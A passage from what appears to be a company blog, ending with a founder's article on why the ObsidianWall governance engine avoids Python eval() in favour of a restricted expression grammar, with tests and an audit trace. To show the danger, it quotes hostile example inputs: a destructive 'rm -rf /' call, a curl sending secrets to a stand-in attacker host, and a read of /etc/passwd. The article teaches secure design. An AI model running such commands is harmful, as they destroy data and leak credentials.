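    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


first = evaluate_budget(current_spend=800, estimated_cost=150, budget_amount=1000)
second = evaluate_budget(budget_amount=1000, estimated_cost=150, current_spend=800)

same_inputs = (
    input_fingerprint(current_spend=800, estimated_cost=150, budget_amount=1000)
    == input_fingerprint(budget_amount=1000, estimated_cost=150, current_spend=800)
)

print(first, second, same_inputs)  # ALLOW ALLOW True
```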

Determinism creates trust.

3. Assurance Must Be Continuous

Traditional audits occur periodically.

Programmable Assurance operates continuously.

Every proposed change can be evaluated before implementation.

Every decision can generate evidence.

Every exception can be recorded.

4. Governance Must Be Explainable

Organizations need more than decisions.

They need reasoning.

A governance system should answer:

What decision was made?
Why was it made?
Which conditions influenced the outcome?
What evidence supported the decision?
Who approved exceptions?

Explainability transforms governance from a black box into an accountable process.

5. Accountability Must Be Programmable

Governance is ultimately about accountability.

Different stakeholders own different risks:

Engineers own implementation.
Security teams own security risk.
Budget owners own financial risk.
Compliance teams own regulatory risk.
Executives own business risk.

Programmable Assurance routes governance decisions to the stakeholders responsible for those risks while preserving operational velocity.
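The routing idea can be sketched as a lookup from risk type to owner. The keys and owner labels below are hypothetical names for the stakeholder list above, not a defined schema.

```python
from typing import Iterable, List

# Hypothetical mapping derived from the ownership list above.
RISK_OWNERS = {
    "implementation": "engineers",
    "security": "security_team",
    "financial": "budget_owner",
    "regulatory": "compliance_team",
    "business": "executives",
}


def route(risk_types: Iterable[str]) -> List[str]:
    """Return the distinct owners who must see a decision, in stable order."""
    return sorted({RISK_OWNERS[risk] for risk in risk_types})


# A change that exceeds budget and touches a regulated control.
print(route(["financial", "regulatory"]))  # ['budget_owner', 'compliance_team']
```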

Beyond Policy-as-Code

Programmable Assurance is not merely Policy-as-Code.

Policy-as-Code focuses on expressing rules as executable logic.

Programmable Assurance encompasses a broader lifecycle:

Intent → Policy → Evaluation → Decision → Explainability → Accountability → Evidence → Continuous Assurance

Policy execution is only one component.

Assurance is the outcome.

Why This Matters

As organizations become increasingly software-defined and AI-driven, governance can no longer remain document-centric.

Organizations require systems capable of continuously translating intent into enforceable outcomes.

Programmable Assurance provides a framework for achieving that goal.

It transforms governance from static documentation into an active operational capability.

The future of governance is not more policies. The future of governance is making assurance programmable.

Why I Didn't Use eval() in ObsidianWall's Policy Engine — And What I Built Instead

Aisha — Mon, 25 May 2026 13:00:00 +0000

By Aisha Ibrahim
Founder, ObsidianWall

When you're building a tool that evaluates policy expressions like this:

(current_spend + estimated_cost) <= budget.amount

the obvious implementation is a single line of Python:

result = eval(expression, context)

It works. It's clean. It takes five minutes to write.

I didn't use it. Here's exactly why — and what I built instead.

What ObsidianWall Is

Before getting into the technical decision, some context.

ObsidianWall is a programmable assurance platform — a system for encoding human governance intent as executable policy, evaluating it deterministically, and enforcing it transparently with full audit traceability.

The core doctrine of the platform is this:

AI may advise. AI may explain. AI may optimize. AI may recommend.
AI may NOT authoritatively govern.

That single principle drives every architectural decision in the platform, including the one this article is about.

ObsidianWall Verdict is the first executable built on that platform — a deterministic pre-deployment infrastructure governance engine. It evaluates infrastructure plans against policy before deployment happens, produces an enforcement decision, and generates an audit-grade trace of exactly how that decision was reached.

The expression evaluator is at the heart of how Verdict makes those decisions. And that is where eval() became the wrong answer.

The Problem With eval() in a Governance Engine

eval() executes arbitrary Python expressions. That sentence sounds harmless until you think carefully about what "arbitrary" means in the context of a system that:

Accepts policy files written by humans
Processes infrastructure plans from CI/CD pipelines
Makes enforcement decisions that block or allow deployments
Produces audit records that compliance teams rely on

In that context, "arbitrary" means each of the following is a valid input to your evaluator:

# Someone writes this as a policy condition expression:
"__import__('os').system('rm -rf /')"

# Or this:
"__import__('subprocess').call(['curl', 'http://attacker.com', '-d', secrets])"

# Or something subtler:
"open('/etc/passwd').read() == 'root'"

eval() executes all of them without question.

The standard advice is to sandbox it by removing builtins:

result = eval(expression, {"__builtins__": {}}, context)

This is not sufficient. Python's object model provides paths back to dangerous capabilities through class hierarchies even with builtins removed: attribute access alone can walk from any literal up to object and back down to every loaded class. Published attempts at an eval sandbox built this way have been bypassed again and again. Treat it as an unsolved problem, not an engineering challenge you can outthink with a clever enough sandbox.
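A minimal, harmless demonstration of that reachability, assuming CPython. With builtins stripped, plain attribute access on a tuple literal still reaches object and, from there, every class currently loaded in the interpreter. The variable names are illustrative.

```python
# Builtins are removed, but attribute access needs no builtins at all.
restricted_globals = {"__builtins__": {}}

# Walk from an empty tuple up to `object`, then back down to its subclasses.
expression = "().__class__.__base__.__subclasses__()"
reachable = eval(expression, restricted_globals, {})

# The "sandboxed" expression now holds references to ordinary classes.
print(dict in reachable, len(reachable) > 0)
```

Real escapes go further than this and search that list for a class that leads back to module globals. The point here is only that removing builtins does not remove reachability.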

But the security problem is not even the most important reason to reject eval().

The Real Problem: Auditability

A governance engine is not a calculator. It is a system that makes enforcement decisions about infrastructure and produces audit records that humans, compliance teams, and regulators rely on.

For that system to be trustworthy, every decision must be:

Deterministic — the same input always produces the same output, without exception
Auditable — a human reading the trace can verify the decision independently without running any code
Bounded — the complete set of things the evaluator can do is finite, known, and describable

eval() fails all three requirements.

It cannot guarantee determinism: side effects, I/O, and state mutations are all possible inside an evaluated expression. It is not auditable: you cannot fully describe its behavior surface without describing all of Python. It is unbounded: it can do anything Python can do.

What a governance engine actually needs is not a Python expression evaluator. It needs a restricted expression grammar — a purposefully small language that can only do exactly what policy evaluation requires, and nothing else. The restriction is not a limitation. It is the entire point.

The Solution: A Deterministic Expression Grammar

ObsidianWall Verdict's condition evaluator supports a deliberately minimal grammar:

Comparison operators:   <=   >=   <   >   ==
Arithmetic operations:  addition  ( a + b )
Operand types:          context keys,  numeric literals

That is the complete grammar. No function calls. No variable assignment. No imports. No string manipulation. No loops. No conditionals beyond the comparison itself.

If an expression requires anything outside this grammar, the evaluator does not attempt to execute it. It raises an error with a clear message. The boundary is explicit, enforced, and fully testable.

This means a policy author can write:

conditions:
  - id: budget_check
    expression: "(current_spend + estimated_cost) <= budget.amount"
    description: "Monthly spend cap enforcement"

And the evaluator resolves it step by step:

Strip cosmetic parentheses
Identify the comparison operator: <=
Split into left side and right side
Resolve left side, current_spend + estimated_cost, by looking up each key in the runtime context and summing them
Resolve right side, budget.amount, by looking up the key in the runtime context
Apply the operator: with current_spend = 0, estimated_cost = 100, and budget.amount = 50.0, this is 100 <= 50.0
Return the result: False

Every step is traceable. Every step is verifiable. A compliance engineer reading the audit output can reconstruct the evaluation manually without running any code. That is what auditability means in practice — not just logging that a decision happened, but making the decision itself independently verifiable.
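The steps above can be sketched in a few dozen lines. This is a hypothetical illustration, not Verdict's actual implementation: the helper names, the regular expressions, and the choice to reject non-numeric context values are all assumptions made for the example. Only evaluate_expression and the grammar itself come from the article.

```python
import operator
import re

# Hypothetical sketch of the restricted grammar; not ObsidianWall's real code.
COMPARATORS = {
    "<=": operator.le,
    ">=": operator.ge,
    "==": operator.eq,
    "<": operator.lt,
    ">": operator.gt,
}
# Two-character operators come first so "<=" is never read as "<".
OPERATOR_PATTERN = re.compile(r"(<=|>=|==|<|>)")
KEY_PATTERN = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*")
NUMBER_PATTERN = re.compile(r"\d+(\.\d+)?")


def strip_parens(text):
    """Remove parentheses that wrap an entire side of the comparison."""
    text = text.strip()
    while text.startswith("(") and text.endswith(")"):
        text = text[1:-1].strip()
    return text


def resolve_term(term, context):
    """Resolve one operand: a numeric literal or a flat context key."""
    term = term.strip()
    if NUMBER_PATTERN.fullmatch(term):
        return float(term)
    if KEY_PATTERN.fullmatch(term):
        if term not in context:
            raise ValueError(f"unknown context key: {term!r}")
        value = context[term]
        # bool is a subclass of int, so exclude it explicitly.
        if isinstance(value, bool) or not isinstance(value, (int, float)):
            raise ValueError(f"non-numeric value for key: {term!r}")
        return value
    # Anything else (calls, quotes, stray parentheses) is outside the grammar.
    raise ValueError(f"term outside grammar: {term!r}")


def resolve_side(side, context):
    """Sum the '+'-separated operands on one side of the comparison."""
    return sum(resolve_term(t, context) for t in strip_parens(side).split("+"))


def evaluate_expression(expression, context):
    """Evaluate '<sum> <comparator> <sum>' against a flat context."""
    parts = OPERATOR_PATTERN.split(expression)
    if len(parts) != 3:  # exactly one comparison operator is allowed
        raise ValueError(f"expression outside grammar: {expression!r}")
    left, symbol, right = parts
    return COMPARATORS[symbol](
        resolve_side(left, context), resolve_side(right, context)
    )
```

Nothing in this sketch parses or executes Python. An input either matches the small set of patterns or raises ValueError, which is what keeps the behavior surface describable.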

The Normalization Layer — Bridging Human Intent and Machine Evaluation

There is an architectural subtlety that took real design work to get right.

Governance policies are written by humans in nested, readable structures:

spec:
  parameters:
    budget:
      amount: 50
      period: monthly
      owner: team-alpha

But the deterministic evaluator operates against a flat key-value context. It resolves budget.amount as a single literal key lookup: no nested object traversal, no dynamic attribute access, no recursive dict walking.

The naive solution is to make the evaluator smart about nested structures. That is the wrong solution. It contaminates the evaluator with policy structure knowledge, widens the behavior surface that its determinism guarantees have to cover, and makes it significantly harder to audit.

The correct solution is a normalization layer that runs before evaluation — a dedicated component whose only job is to translate human-readable nested policy structures into evaluator-ready flat contexts:

Input:   {"budget": {"amount": 50, "period": "monthly"}}
Output:  {"budget.amount": 50, "budget.period": "monthly"}

After normalization, the evaluator receives a flat context. It resolves budget.amount directly. It never needs to know how the policy was structured. The normalization layer is the bridge — and it is the only place in the system that understands both the policy structure and the evaluation context simultaneously.
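A minimal sketch of such a flattening step, reproducing the input and output shown above. The function names flatten and build_runtime_context are hypothetical, and refusing key collisions between the plan inputs and the policy parameters is an assumption of this example, not documented Verdict behavior.

```python
def flatten(nested, prefix=""):
    """Turn nested dicts into a flat dict with dotted keys."""
    flat = {}
    for key, value in nested.items():
        path = f"{prefix}.{key}" if prefix else str(key)
        if isinstance(value, dict):
            flat.update(flatten(value, path))
        else:
            flat[path] = value
    return flat


def build_runtime_context(input_context, parameters):
    """Merge plan inputs with flattened policy parameters.

    Assumption for this sketch: a key present on both sides is an error,
    so neither source can silently overwrite the other.
    """
    flattened = flatten(parameters)
    clashes = sorted(set(input_context) & set(flattened))
    if clashes:
        raise ValueError(f"context key collision: {clashes}")
    return {**input_context, **flattened}


parameters = {"budget": {"amount": 50, "period": "monthly"}}
runtime_context = build_runtime_context(
    {"current_spend": 0, "estimated_cost": 100}, parameters
)
print(runtime_context)
```

The recursion lives entirely in this layer, so the evaluator downstream only ever performs exact key lookups.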

The evaluation pipeline becomes:

Raw Policy YAML
      ↓
Canonicalize DSL structure
      ↓
Validate against schema contract
      ↓
Flatten + merge into runtime context     ← normalization layer
      ↓
Restricted expression evaluation         ← deterministic, bounded
      ↓
Decision + immutable audit trace

Each layer has one responsibility. Each layer can be tested independently. Each layer can be audited independently. No layer needs to understand what the others are doing internally.

What This Means for Testing

Because the expression evaluator is a pure function with no side effects and a completely bounded input surface, testing it requires no mocking, no fixtures, and no infrastructure:

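import pytest  # used by pytest.raises in the third test

# evaluate_expression is the evaluator under test; its import path is omitted here.


def test_blocks_when_budget_exceeded():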
    context = {
        "current_spend":  0,
        "estimated_cost": 100,
        "budget.amount":  50.0
    }
    result = evaluate_expression(
        "(current_spend + estimated_cost) <= budget.amount",
        context
    )
    assert result is False


def test_allows_when_within_budget():
    context = {
        "current_spend":  0,
        "estimated_cost": 30,
        "budget.amount":  50.0
    }
    result = evaluate_expression(
        "(current_spend + estimated_cost) <= budget.amount",
        context
    )
    assert result is True


def test_rejects_expression_outside_grammar():
    with pytest.raises(ValueError):
        evaluate_expression(
            "__import__('os').system('ls')",
            {}
        )

An expression and a context go in. A result comes out. You assert the result. No setup. No teardown. No dependencies. That is what happens when you build a pure deterministic function instead of delegating to eval().

The third test is particularly important for a governance engine. The evaluator does not just fail silently on unsupported expressions — it explicitly rejects them. The boundary is enforced, not just hoped for.

The Principle Behind the Decision

The decision not to use eval() is not primarily a security decision, though security is one outcome.

It is a decision about what kind of system ObsidianWall is.

The ObsidianWall doctrine says AI may advise but may not authoritatively govern. The same principle applies to the expression evaluator — it may evaluate exactly what the grammar allows, and nothing else. The restriction is the guarantee. The boundary is the trust.

A governance engine is only useful if the people governed by it trust it. Trust requires transparency. Transparency requires that the system's behavior be fully describable — that an engineer, a compliance officer, or a regulator can read the evaluation trace and verify independently that the decision was correct.

eval() cannot offer that guarantee. A restricted expression grammar can.

The minimal grammar is not a limitation imposed by inability. It is a design statement:

This system does exactly this, and nothing else. You can verify that. We built it that way on purpose.

That is what programmable assurance means.

The Audit Output

When Verdict evaluates a plan and reaches a decision, the audit artifact looks like this:

{
  "decision": "DENY",
  "conditions_passed": false,
  "trace": [
    {
      "condition_id": "budget_check",
      "expression": "(current_spend + estimated_cost) <= budget.amount",
      "result": false,
      "description": "Monthly spend cap enforcement"
    }
  ],
  "input_context": {
    "estimated_cost": 100,
    "current_spend": 0
  },
  "runtime_context": {
    "estimated_cost": 100,
    "current_spend": 0,
    "budget.amount": 50.0,
    "budget.period": "monthly"
  }
}

Two contexts are preserved separately — input_context captures what came in from the infrastructure plan, runtime_context captures the fully normalized state the evaluator actually saw. That separation matters for forensic reconstruction, compliance export, and replay — you can reproduce the exact evaluation state at any point in the future from the audit record alone.
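One way replay from the audit record alone might look, as a sketch under stated assumptions. The replay function and its evaluate parameter are hypothetical names; the evaluator is passed in so the example stays self-contained, and stand_in_evaluate hard-codes the single expression from the record above and is not a real evaluator.

```python
def replay(audit_record, evaluate):
    """Re-evaluate each traced condition against the recorded runtime_context.

    Returns the condition_ids whose recomputed result differs from the record.
    """
    runtime_context = audit_record["runtime_context"]
    mismatches = []
    for step in audit_record["trace"]:
        recomputed = evaluate(step["expression"], runtime_context)
        if recomputed != step["result"]:
            mismatches.append(step["condition_id"])
    return mismatches


BUDGET_EXPRESSION = "(current_spend + estimated_cost) <= budget.amount"


def stand_in_evaluate(expression, context):
    """Stand-in for the real evaluator; supports only BUDGET_EXPRESSION."""
    if expression != BUDGET_EXPRESSION:
        raise ValueError(f"unsupported expression: {expression!r}")
    total = context["current_spend"] + context["estimated_cost"]
    return total <= context["budget.amount"]


audit_record = {
    "decision": "DENY",
    "trace": [
        {
            "condition_id": "budget_check",
            "expression": BUDGET_EXPRESSION,
            "result": False,
        }
    ],
    "runtime_context": {
        "estimated_cost": 100,
        "current_spend": 0,
        "budget.amount": 50.0,
        "budget.period": "monthly",
    },
}

print(replay(audit_record, stand_in_evaluate))  # prints []
```

An empty list means every recorded result was reproduced from the stored context. A record whose result field had been edited after the fact would show up here by its condition_id.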

What's Next

This is the first article in a series on the architecture behind ObsidianWall.

The next two cover:

How the enforcer/recommender separation preserves the AI authority boundary — why the system that makes enforcement decisions must be architecturally isolated from the system that generates recommendations, and what happens to governance trust when that boundary is violated.

How programmable assurance differs from reactive governance — why alerting, dashboards, and drift detection are fundamentally different abstractions from deterministic decision systems, and why that difference matters in AI-era infrastructure.

ObsidianWall Verdict is currently in early access.

If you are dealing with infrastructure budget overruns, compliance violations discovered after deployment, or policy drift across engineering teams — Verdict was built for exactly that problem.

Early access: obsidianwall.com

Aisha is the founder of ObsidianWall — a programmable assurance platform for deterministic governance and AI-native operational intelligence.